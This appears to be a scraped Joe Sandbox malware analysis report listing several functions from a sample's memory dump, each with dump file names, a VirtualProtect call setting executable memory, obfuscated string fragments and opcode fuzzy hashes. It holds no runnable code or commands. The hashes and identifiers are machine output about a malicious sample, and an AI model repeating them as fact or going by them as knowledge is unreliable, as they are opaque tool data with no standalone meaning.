                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                                                                                                      • Instruction ID: d7a296b10f212e9af49ab3c416a3833ced58286689dd1539334ceac151fafce4
                                                                                                                                                      • Opcode Fuzzy Hash: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                                                                                                      • Instruction Fuzzy Hash: A2D146A2D082949AF7218624DC44BEB7B79EF91310F1481FED54D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040AAC9 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 382memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                                                                                                      • Instruction ID: 2ef544b212997e4fa31eec0942fd3b924e6969ce177f6a5f87ea744a3f2af44a
                                                                                                                                                      • Opcode Fuzzy Hash: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                                                                                                      • Instruction Fuzzy Hash: DFD146A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      Function 0040A984 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 380memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                                                                                                      • Instruction ID: 4790f4736528595fe89bac11a1248bc76c36d27961205c98a63ae5969e88619c
                                                                                                                                                      • Opcode Fuzzy Hash: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                                                                                                      • Instruction Fuzzy Hash: D4D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      Function 0040A9AE Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 378memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                                                                                                      • Instruction ID: 90faed7bee1ee36d03feeb63130216d79dd2597e9304a2bcdf97559ea1b09dd1
                                                                                                                                                      • Opcode Fuzzy Hash: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                                                                                                      • Instruction Fuzzy Hash: D8D146A2D082A49AF7218724DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      Function 0040B524 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 378memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                                                                                                      • Instruction ID: 0371a4b27facc6ada17a49e1f9b6af079a9a001b71fe6c1c6e946b71b6c7c027
                                                                                                                                                      • Opcode Fuzzy Hash: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                                                                                                      • Instruction Fuzzy Hash: 1FD144A1D082949BF7218624DC85BEB7B79EF81310F0481FED44D6A281D27E4FC6CB66
                                                                                                                                                      Function 0040B489 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 364memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                                                                                                      • Instruction ID: 81a1e5a6bc3b10ed7a4da47fcac608d4515ba001ea5eca5989b0f0c4c62595f1
                                                                                                                                                      • Opcode Fuzzy Hash: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                                                                                                      • Instruction Fuzzy Hash: 73D144A1D082A89BF7218624DC857EB7B79EF91310F1481FED44D66281D27E0FC68B67
                                                                                                                                                      Function 0040B494 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 364memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                                                                                                      • Instruction ID: af87c79a6a843894e6144d3079a128d34d891af3e7149fc025cb9fe82e067a62
                                                                                                                                                      • Opcode Fuzzy Hash: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                                                                                                      • Instruction Fuzzy Hash: 46D145A1D082989BF7218624DC85BEB7B79EF91310F1481FAD44D66281D27E0FC6CB66
                                                                                                                                                      Function 0040B5D4 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 363COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                                                                                                      • Instruction ID: e2c6151aa9e1a55468fcc572f6645a23d0efd6f80fbeabc255d88c0749e44b9c
                                                                                                                                                      • Opcode Fuzzy Hash: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                                                                                                      • Instruction Fuzzy Hash: 5ED164A2D082949BF7218624DC85BEB7B79EF91300F1481FED44D66281D27E0FC68B67
                                                                                                                                                      Function 0040B609 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 346memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
                                                                                                                                                      • Instruction ID: ec2c7275a11da5b48301671a939b02e52abdf974147d9040d07dd93b18dc885f
                                                                                                                                                      • Opcode Fuzzy Hash: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
